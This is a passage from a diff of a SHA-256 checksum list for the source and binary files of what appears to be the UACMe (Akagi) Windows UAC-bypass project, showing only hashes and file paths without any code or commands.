29433a8f69137f2921af02b6027b75a5f13eb3bec9514768f2db48916b55c433 *Source\Akagi\uacme.vcxproj
516f7cf09b4e643e03df1632662ffa124c16b24c23d81b19d405ebad49ea1262 *Source\Akagi\uacme.vcxproj.filters
1db3658f964e6504bf85e63395f2588ecd04f7a44577e4e61e72d2fee1d7738d *Source\Akagi\uacme.vcxproj.user
f50ec7aba17c0b76a7603ec0207cf4d7903b50c535f346c1e458b1e3c9a7885c *Source\Akagi\bin\Akatsuki64.cd
8b7b192024f1e7e347b10bbfc89cd90bd44d8694466b0c32ad4b36ccc8b9dbcf *Source\Akagi\bin\Chiyoda64.cd
adc3a90536bf15018da57b5a25851b0724b20ae6bd083fd2ebd598d7a8081b12 *Source\Akagi\bin\Fubuki32.cd
4628acaf0336d4019282a52e3a7da431c0c48b4bf0dcd0cf5e5170c177a2b9df *Source\Akagi\bin\Fubuki64.cd
5f605cbdf5d2df31e7a947fe1aad2854949a8ed4492a5c75bbd354a05dee06da *Source\Akagi\bin\Fujinami.cd
db12aa2d259d8147fb5aafc8705f64e147610767c52aee9e391f4e80efc504c8 *Source\Akagi\bin\Hibiki32.cd
7a7c2ece293096914b672bb1df194bad35b3d2e22796900f4c788856cf7cd9f8 *Source\Akagi\bin\Hibiki64.cd
f416a307314e57c42b9df0826a59492e3939a75353edd353ce608b401e258d0c *Source\Akagi\bin\Ikazuchi32.cd
93262fb94835c48c5b3743844b2d51db4bd859eb464c70fe9bf9b91a8642c7b8 *Source\Akagi\bin\Ikazuchi64.cd
7cad335bc00087bdb652260e22b7ff916e4b4a22b8ed5db8dacbed423be5ecb6 *Source\Akagi\bin\Kamikaze.cd
3f8bc4c7705420a8b6c5dc5699d16770834ec91792950fec5a65550f66750c2b *Source\Akagi\bin\Kongou32.cd
4fcced73821e41ebdce34c506bf13a4c11c05e60826cbb53e3b4ace3625bfb2b *Source\Akagi\bin\Kongou64.cd
7cb684f646a22e3dc803a167f59fe666c249b3c69029660880a1be5735af5bc2 *Source\Akagi\uacme.vcxproj.user
9c3e2d3e36f1d1c8e60edf6aabef9b881b85e52b00f63bc248736b6be63a618a *Source\Akagi\bin\Akatsuki64.cd
626c3d4eacd764c9e05ced73b0b424d5c289d163b50a4e4c694d162226007d5e *Source\Akagi\bin\Chiyoda64.cd
a0d8b7855a6b897be3db3a890d3e9ad1d8b82aafc830f2cfbb39d46da8124614 *Source\Akagi\bin\Fubuki32.cd
66e932e13d9ad3b1d6f54600398cd075b56235948faa17009fe2ef7a069de917 *Source\Akagi\bin\Fubuki64.cd
e639c9c5c1232f4cc8196f12d843e72ef757b4a015cc8a08b81319109a597024 *Source\Akagi\bin\Fujinami.cd
8797ba02ed0e8d31aad62067e2d499a8d40979bc2c7cb3a4fd0bfe2b733a39d5 *Source\Akagi\bin\Hibiki32.cd
41564e313dc6f001a6c86a3dee57d70e860ecb759fe557d3498243b14d3c184a *Source\Akagi\bin\Hibiki64.cd
318f9f9efe41427e03d7219648802a50fae77eeac121a2d0e35550725bfe5063 *Source\Akagi\bin\Ikazuchi32.cd
cf0c711925d07a0791ff6ec107c0ef31da4b6971a47368a256b15fd9ea439e89 *Source\Akagi\bin\Ikazuchi64.cd
efce39221185db8d7e80a302c2edf948ac950e4ed2cf9991331cc72823c5b9ef *Source\Akagi\bin\Kamikaze.cd
07b2c0263bbc7c82e7b54af836feb7fea85903e0f4546e463675c69a9e7cb9b8 *Source\Akagi\bin\Kongou32.cd
770829bf778d8311747f9bc3a480d8e2f592be7062ee59760b266848280bde89 *Source\Akagi\bin\Kongou64.cd
d2e98979ba296abb4cad7ab142db85da10a62b6c2193f89e206a4c2ed5ff19db *Source\Akagi\lib\AppHelp32.lib
dc7fe105fd095121932b4c483ebcbf35d729fefeab7a7fb766fe9a3953f91ef1 *Source\Akagi\lib\AppHelp64.lib
124c9bd1140c7df8b41f8592f9b98d3e557bb4f58af51a9285de2eba5ff19027 *Source\Akagi\methods\api0cradle.c
@ -66,7 +66,7 @@ e38fe4a7e85727336360fdc944e133775734d8fbbc3f7c756aeee63e960f3955 *Source\Akagi\m
b7d0c01c1f07c0d245bde5ac7bdc04992185d7a5ea48df5e8e1e39d14bf21819 *Source\Akagi\methods\hakril.h
4054807a1e4e0f6d7c0d39964e4696841e4ff769db100aa7ac94d6b0ede44716 *Source\Akagi\methods\hybrids.c
320990aaa9c0048df2a287dfa2690d0f2e6b506bd3b419e07ed62e386ba6f9fc *Source\Akagi\methods\hybrids.h
06f8a87f7b92362145981bdf2ad6610b3f025298dc7d2734520e6a2d06b7a945 *Source\Akagi\methods\methods.c
7fa614bdbfacef0b951aefe42bf752939536fd5a639dfe626426873feab5d350 *Source\Akagi\methods\methods.c
b2ee22d4e72afffb7f2b5e0c2b02e07a912a1eb44912a193e3b9211ad34e56ee *Source\Akagi\methods\methods.h
14095d4753ea21f3cb5b89bd8bb1955583fbeebc115fc3e9b71dedc9b3bf14a7 *Source\Akagi\methods\pitou.c
cc1a0a414b6f1bc6b1301fd5119371811fbd6cb99b884356df71d960a8933cc8 *Source\Akagi\methods\pitou.h
@ -110,9 +110,12 @@ a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\
21b205c0c653f47fc92769de3af7a2abba28e3c2eff570ad29e031bd859eb924 *Source\Fubuki\version.rc
eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h
b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94 *Source\Fubuki\winmm.h
87aab17a851960e5330451613cda681588f13448ca520ddc7462ddebf2b56a00 *Source\Fujinami\EntryPoint.cs
b53717c272060cae36ae0fb16e0373ce2dd1de8334cb992df5d01b6379413eed *Source\Fujinami\Fujinami.csproj
13747a263c0f84aadb88ae0689326a6d2720ebe5589f221e867bac85cc01116f *Source\Fujinami\Properties\AssemblyInfo.cs
647cffcd0a4fc3a32edf6f54508d163a11b78289b6fbba303b2a02bb2cc44035 *Source\Fujinami\EntryPoint.cs
203b4a6961e7266172a7cd82956c5a5ea2c70501e5199abb29c919b50c03e589 *Source\Fujinami\Fujinami.csproj
707161f8ba9399bb6d58f22bb4869a0727219eadfa685915c57e8c06e54565d3 *Source\Fujinami\WinNT.cs
bd7e73bd27e5a6fd78e1e80d2bf353c03f2a1b6a1f38133ed8db540391de025b *Source\Fujinami\Properties\AssemblyInfo.cs
ece8957f53bb676474f1db6fabe9eefba253f662881d947f4a0756526ce7ebe8 *Source\Fujinami\Properties\Resources.Designer.cs
86ff051bc89b01c71274c48ac1be4311a2d652209ca51467064c574a57e1bad4 *Source\Fujinami\Properties\Resources.resx
0a5bdcd2377cee27181118c2b036d9ca92f0cb4288b1033ea933b543c005b66c *Source\Fujinami\Properties\Settings.Designer.cs
6fd5dfd9c7171147c5395d52ac220bae0d13efac35e4e7449ebf29dfeedec42b *Source\Fujinami\Properties\Settings.settings
7fcfb7c724da9ec19a625cea4909f59344394d08bcdffab518036d00ad099043 *Source\Hibiki\dllmain.c
@ -145,7 +148,7 @@ d96fae8d500b17819fe4426df12f68630c5178eff7006e9ea514e125592650f2 *Source\Naka\na
e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221 *Source\Naka\Naka.vcxproj.user
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h
3d024a7163439588778ad34d83afda0b8ad5fe9e05d70208d8dc05a1459ab703 *Source\Shared\consts.h
f9ee3db5958f38e44755fc2548b8c2cf1133ff3541ca1bd7ca8dfb28b47c7bfd *Source\Shared\consts.h
01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c
b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h
ee22e37e96fff018dd12f38423be8d5f6ca1821b11c70bfc182ffa9da23bdd73 *Source\Shared\libinc.h